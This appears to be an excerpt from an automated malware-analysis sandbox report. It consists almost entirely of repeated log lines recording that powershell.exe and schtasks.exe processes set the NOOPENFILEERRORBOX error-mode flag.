          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
